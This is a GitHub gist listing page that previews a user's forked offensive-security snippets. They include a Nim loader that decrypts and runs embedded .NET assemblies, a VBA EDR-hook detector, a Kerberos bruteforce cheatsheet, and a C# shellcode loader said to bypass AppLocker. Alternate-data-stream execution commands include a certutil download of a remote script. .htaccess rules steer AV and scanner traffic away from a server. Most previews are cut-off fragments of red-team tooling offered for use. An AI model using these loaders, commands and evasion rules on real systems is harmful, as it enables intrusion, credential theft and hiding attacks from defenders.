Skip to content

Instantly share code, notes, and snippets.

View ceramicskate0's full-sized avatar
:octocat:
Coding things ;)

Ceramicskate0 ceramicskate0

:octocat:
Coding things ;)
149 followers · 270 following
View GitHub Profile
@ceramicskate0
ceramicskate0 / rsrcDecryptAssembly.nim
Created January 7, 2022 03:36 — forked from ChoiSG/rsrcDecryptAssembly.nim
embed .net, decrypt, load and execute in nim poc
import nimcrypto
import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy
#[
All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t
nimble install winim nimcrypto zippy
nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim
slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time.
@ceramicskate0
ceramicskate0 / hookdetector.vba
Created December 8, 2020 02:36 — forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@ceramicskate0
ceramicskate0 / kerberos_attacks_cheatsheet.md
Created July 18, 2020 15:09 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@ceramicskate0
ceramicskate0 / Shellcode.cs
Created March 23, 2020 01:32 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@ceramicskate0
ceramicskate0 / bin2sc.py
Created March 23, 2020 01:14 — forked from superkojiman/bin2sc.py
Convert bin to shellcode.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) < 2:
print "usage: %s file.bin\n" % (sys.argv[0],)
sys.exit(0)
shellcode = "\""
ctr = 1
maxlen = 15
@ceramicskate0
ceramicskate0 / Exe_ADS_Methods.txt
Created March 17, 2020 00:41 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
@ceramicskate0
ceramicskate0 / transformFile.py
Created February 23, 2020 15:45 — forked from Arno0x/transformFile.py
Performs multiple useful transformation on files
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
@ceramicskate0
ceramicskate0 / htaccess_methods
Created July 23, 2019 17:08
#LogLevel alert rewrite:trace3
#Time based access
RewriteCond %{TIME_HOUR}%{TIME_MIN} <0600
RewriteCond %{TIME_HOUR}%{TIME_MIN} >1800
RewriteRule ^.*$ replaceme [L]
#Day of week based access
RewriteCond %{TIME_WDAY} =0
RewriteCond %{TIME_WDAY} =6
RewriteRule ^.*$ replaceme [L]
@ceramicskate0
ceramicskate0 / htaccess_USEAGENTS
Last active July 23, 2019 17:09
.htaccess of non windows user generated user agents
RewriteCond %{HTTP_USER_AGENT} "bits|bitsadmin|WindowsPowerShell|certutil|adobe" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "zgrab|+|X11|OpenBSD|Googlebot|python|java|linux|wget|curl|.net|git|virustotalcloud|Gh0st" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "Firefox/3.6.8|Safari|OS x|-|HTTP Banner Detection|Lynx|Slackbot|nmap|burp|cloudfront|bingbot|clshttp|archiver|sparta|loader|email|nikto|nessus|rapid|Qualys|vas|miner|sparta|HTTrack|crawl|shell|yahoo|google|bot|b\-o\-t|spider|baidu" [NC]
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|iPhone|googlebot-mobile|Kindle|Nintendo|PlayStation|Windows Phone|XBOX_ONE_ED|AppleTV|Roku|CrOS|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos" [NC]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ replaceme [L]
#User agent string for native compiled software Libs and Linux tools
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
@ceramicskate0
ceramicskate0 / .htaccess
Created July 23, 2019 16:33 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
Define REDIR_TARGET |DESTINATIONURL|
RewriteEngine On
RewriteOptions Inherit